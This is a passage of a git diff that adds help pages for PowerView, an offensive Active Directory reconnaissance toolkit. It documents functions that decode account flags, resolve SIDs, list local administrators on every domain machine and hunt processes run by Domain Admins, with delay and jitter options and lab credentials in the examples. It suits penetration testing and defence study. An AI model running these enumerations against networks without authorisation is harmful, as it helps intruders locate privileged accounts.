+
+## SYNTAX
+
+```
+ConvertFrom-UACValue [-Value] <Int32> [-ShowAll]
+```
+
+## DESCRIPTION
+This function will take an integer that represents a User Account
+Control (UAC) binary blob and will covert it to an ordered
+dictionary with each bitwise value broken out.
+By default only values
+set are displayed- the -ShowAll switch will display all values with
+a + next to the ones set.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+ConvertFrom-UACValue -Value 66176
+```
+
+Name Value
+---- -----
+ENCRYPTED_TEXT_PWD_ALLOWED 128
+NORMAL_ACCOUNT 512
+DONT_EXPIRE_PASSWORD 65536
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainUser harmj0y | ConvertFrom-UACValue
+```
+
+Name Value
+---- -----
+NORMAL_ACCOUNT 512
+DONT_EXPIRE_PASSWORD 65536
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll
+```
+
+Name Value
+---- -----
+SCRIPT 1
+ACCOUNTDISABLE 2
+HOMEDIR_REQUIRED 8
+LOCKOUT 16
+PASSWD_NOTREQD 32
+PASSWD_CANT_CHANGE 64
+ENCRYPTED_TEXT_PWD_ALLOWED 128
+TEMP_DUPLICATE_ACCOUNT 256
+NORMAL_ACCOUNT 512+
+INTERDOMAIN_TRUST_ACCOUNT 2048
+WORKSTATION_TRUST_ACCOUNT 4096
+SERVER_TRUST_ACCOUNT 8192
+DONT_EXPIRE_PASSWORD 65536+
+MNS_LOGON_ACCOUNT 131072
+SMARTCARD_REQUIRED 262144
+TRUSTED_FOR_DELEGATION 524288
+NOT_DELEGATED 1048576
+USE_DES_KEY_ONLY 2097152
+DONT_REQ_PREAUTH 4194304
+PASSWORD_EXPIRED 8388608
+TRUSTED_TO_AUTH_FOR_DELEGATION 16777216
+PARTIAL_SECRETS_ACCOUNT 67108864
+
+## PARAMETERS
+
+### -Value
+Specifies the integer UAC value to convert.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases: UAC, useraccountcontrol
+
+Required: True
+Position: 1
+Default value: 0
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ShowAll
+Switch.
+Signals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### Int
+
+Accepts an integer representing a UAC binary blob.
+
+## OUTPUTS
+
+### System.Collections.Specialized.OrderedDictionary
+
+An ordered dictionary with the converted UAC fields.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144)
+
diff --git a/docs/Recon/ConvertTo-SID.md b/docs/Recon/ConvertTo-SID.md new file mode 100755 index 0000000..71e9cea --- /dev/null +++ b/docs/Recon/ConvertTo-SID.md @@ -0,0 +1,120 @@ +# ConvertTo-SID
+
+## SYNOPSIS
+Converts a given user/group name to a security identifier (SID).
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Convert-ADName, Get-DomainObject, Get-Domain
+
+## SYNTAX
+
+```
+ConvertTo-SID [-ObjectName] <String[]> [[-Domain] <String>] [[-Server] <String>] [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+Converts a "DOMAIN\username" syntax to a security identifier (SID)
+using System.Security.Principal.NTAccount's translate function.
+If alternate
+credentials are supplied, then Get-ADObject is used to try to map the name
+to a security identifier.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+ConvertTo-SID 'DEV\dfm'
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+'DEV\dfm','DEV\krbtgt' | ConvertTo-SID
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred
+
+## PARAMETERS
+
+### -ObjectName
+The user/group name to convert, can be 'user' or 'DOMAIN\user' format.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Name, Identity
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the translation, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to for the translation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+Specifies an alternate credential to use for the translation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more username specification strings on the pipeline.
+
+## OUTPUTS
+
+### String
+
+A string representing the SID of the translated name.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Export-PowerViewCSV.md b/docs/Recon/Export-PowerViewCSV.md new file mode 100755 index 0000000..d2d2a89 --- /dev/null +++ b/docs/Recon/Export-PowerViewCSV.md @@ -0,0 +1,117 @@ +# Export-PowerViewCSV
+
+## SYNOPSIS
+Converts objects into a series of comma-separated (CSV) strings and saves the
+strings in a CSV file in a thread-safe manner.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Export-PowerViewCSV -InputObject <PSObject[]> [-Path] <String> [[-Delimiter] <Char>] [-Append]
+```
+
+## DESCRIPTION
+This helper exports an -InputObject to a .csv in a thread-safe manner
+using a mutex.
+This is so the various multi-threaded functions in
+PowerView has a thread-safe way to export output to the same file.
+Uses .NET IO.FileStream/IO.StreamWriter objects for speed.
+
+Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainUser | Export-PowerViewCSV -Path "users.csv"
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|'
+```
+
+## PARAMETERS
+
+### -InputObject
+Specifies the objects to export as CSV strings.
+
+```yaml
+Type: PSObject[]
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Path
+Specifies the path to the CSV output file.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delimiter
+Specifies a delimiter to separate the property values.
+The default is a comma (,)
+
+```yaml
+Type: Char
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: ,
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Append
+Indicates that this cmdlet adds the CSV output to the end of the specified file.
+Without this parameter, Export-PowerViewCSV replaces the file contents without warning.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### PSObject
+
+Accepts one or more PSObjects on the pipeline.
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://poshcode.org/1590
+http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/](http://poshcode.org/1590
+http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/)
+
diff --git a/docs/Recon/Find-DomainLocalGroupMember.md b/docs/Recon/Find-DomainLocalGroupMember.md new file mode 100755 index 0000000..be4055f --- /dev/null +++ b/docs/Recon/Find-DomainLocalGroupMember.md @@ -0,0 +1,351 @@ +# Find-DomainLocalGroupMember
+
+## SYNOPSIS
+Enumerates the members of specified local group (default administrators)
+for all the targeted machines on the current (or specified) domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetLocalGroupMember, New-ThreadedFunction
+
+## SYNTAX
+
+```
+Find-DomainLocalGroupMember [[-ComputerName] <String[]>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-GroupName <String>] [-Method <String>]
+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and enumerates the members of the specified local
+group (default of Administrators) for each machine using Get-NetLocalGroupMember.
+By default, the API method is used, but this can be modified with '-Method winnt'
+to use the WinNT service provider.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainLocalGroupMember
+```
+
+Enumerates the local group memberships for all reachable machines in the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-DomainLocalGroupMember -Domain dev.testlab.local
+```
+
+Enumerates the local group memberships for all reachable machines the dev.testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainLocalGroupMember -Domain testlab.local -Credential $Cred
+
+Enumerates the local group memberships for all reachable machines the dev.testlab.local
+domain using the alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -GroupName
+The local group name to query for users.
+If not given, it defaults to "Administrators".
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: True (ByPropertyName)
+Accept wildcard characters: False
+```
+
+### -Method
+The collection method to use, defaults to 'API', also accepts 'WinNT'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: CollectionMethod
+
+Required: False
+Position: Named
+Default value: API
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LocalGroupMember.API
+
+Custom PSObject with translated group property fields from API results.
+
+PowerView.LocalGroupMember.WinNT
+
+Custom PSObject with translated group property fields from WinNT results.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-DomainObjectPropertyOutlier.md b/docs/Recon/Find-DomainObjectPropertyOutlier.md new file mode 100755 index 0000000..280e8ef --- /dev/null +++ b/docs/Recon/Find-DomainObjectPropertyOutlier.md @@ -0,0 +1,261 @@ +# Find-DomainObjectPropertyOutlier
+
+## SYNOPSIS
+Finds user/group/computer objects in AD that have 'outlier' properties set.
+
+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain, Get-DomainUser, Get-DomainGroup, Get-DomainComputer, Get-ForestSchemaClass
+
+## SYNTAX
+
+### ClassName (Default)
+```
+Find-DomainObjectPropertyOutlier [-ClassName] <String> [-ReferencePropertySet <String[]>] [-Domain <String>]
+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+### ReferenceObject
+```
+Find-DomainObjectPropertyOutlier [-ReferencePropertySet <String[]>] -ReferenceObject <PSObject>
+ [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Enumerates the schema for the specified -ClassName (if passed) by using Get-ForestSchemaClass.
+If a -ReferenceObject is passed, the class is extracted from the passed object.
+A 'reference' set of property names is then calculated, either from a standard set preserved
+for user/group/computers, or from the array of names passed to -ReferencePropertySet, or
+from the property names of the passed -ReferenceObject.
+These property names are substracted
+from the master schema propertyu name list to retrieve a set of 'non-standard' properties.
+Every user/group/computer object (depending on determined class) are enumerated, and for each
+object, if the object has a 'non-standard' property set, the object samAccountName, property
+name, and property value are output to the pipeline.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainObjectPropertyOutlier -User
+```
+
+Enumerates users in the current domain with 'outlier' properties filled in.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-DomainObjectPropertyOutlier -Group -Domain external.local
+```
+
+Enumerates groups in the external.local forest/domain with 'outlier' properties filled in.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
+```
+
+Enumerates computers in the current domain with 'outlier' properties filled in.
+
+## PARAMETERS
+
+### -ClassName
+Specifies the AD object class to find property outliers for, 'user', 'group', or 'computer'.
+If -ReferenceObject is specified, this will be automatically extracted, if possible.
+
+```yaml
+Type: String
+Parameter Sets: ClassName
+Aliases: Class
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ReferencePropertySet
+Specifies an array of property names to diff against the class schema.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ReferenceObject
+Specicifes the PowerView user/group/computer object to extract property names
+from to use as the reference set.
+
+```yaml
+Type: PSObject
+Parameter Sets: ReferenceObject
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.PropertyOutlier
+
+Custom PSObject with translated object property outliers.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-DomainProcess.md b/docs/Recon/Find-DomainProcess.md new file mode 100755 index 0000000..89dc568 --- /dev/null +++ b/docs/Recon/Find-DomainProcess.md @@ -0,0 +1,517 @@ +# Find-DomainProcess
+
+## SYNOPSIS
+Searches for processes on the domain using WMI, returning processes
+that match a particular user specification or process name.
+
+Thanks to @paulbrandau for the approach idea.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Get-WMIProcess, New-ThreadedFunction
+
+## SYNTAX
+
+### None (Default)
+```
+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>]
+ [-Jitter <Double>] [-Threads <Int32>]
+```
+
+### TargetProcess
+```
+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-ProcessName <String[]>] [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+### UserIdentity
+```
+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserIdentity <String[]>] [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+### TargetUser
+```
+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>]
+ [-UserGroupIdentity <String[]>] [-UserAdminCount] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and queries the domain for users of a specified group
+(default 'Domain Admins') with Get-DomainGroupMember.
+Then for each server the
+function enumerates any current processes running with Get-WMIProcess,
+searching for processes running under any target user contexts or with the
+specified -ProcessName.
+If -Credential is passed, it is passed through to
+the underlying WMI commands used to enumerate the remote machines.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainProcess
+```
+
+Searches for processes run by 'Domain Admins' by enumerating every computer in the domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local
+```
+
+Enumerates Windows 7 computers in dev.testlab.local and returns any processes being run by
+privileged users in dev.testlab.local.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Find-DomainProcess -ProcessName putty.exe
+```
+
+Searchings for instances of putty.exe running on the current domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainProcess -Domain testlab.local -Credential $Cred
+
+Searches processes being run by 'domain admins' in the testlab.local using the specified alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to query for computers AND users, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerUnconstrained
+Switch.
+Search computer objects that have unconstrained delegation.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: Unconstrained
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ProcessName
+Search for processes with one or more specific names.
+
+```yaml
+Type: String[]
+Parameter Sets: TargetProcess
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserIdentity
+Specifies one or more user identities to search for.
+
+```yaml
+Type: String[]
+Parameter Sets: UserIdentity, TargetUser
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserDomain
+Specifies the domain to query for users to search for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: TargetUser
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserLDAPFilter
+Specifies an LDAP query string that is used to search for target users.
+
+```yaml
+Type: String
+Parameter Sets: TargetUser
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserSearchBase
+Specifies the LDAP source to search through for target users.
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: TargetUser
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserGroupIdentity
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: GroupName, Group
+
+Required: False
+Position: Named
+Default value: Domain Admins
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserAdminCount
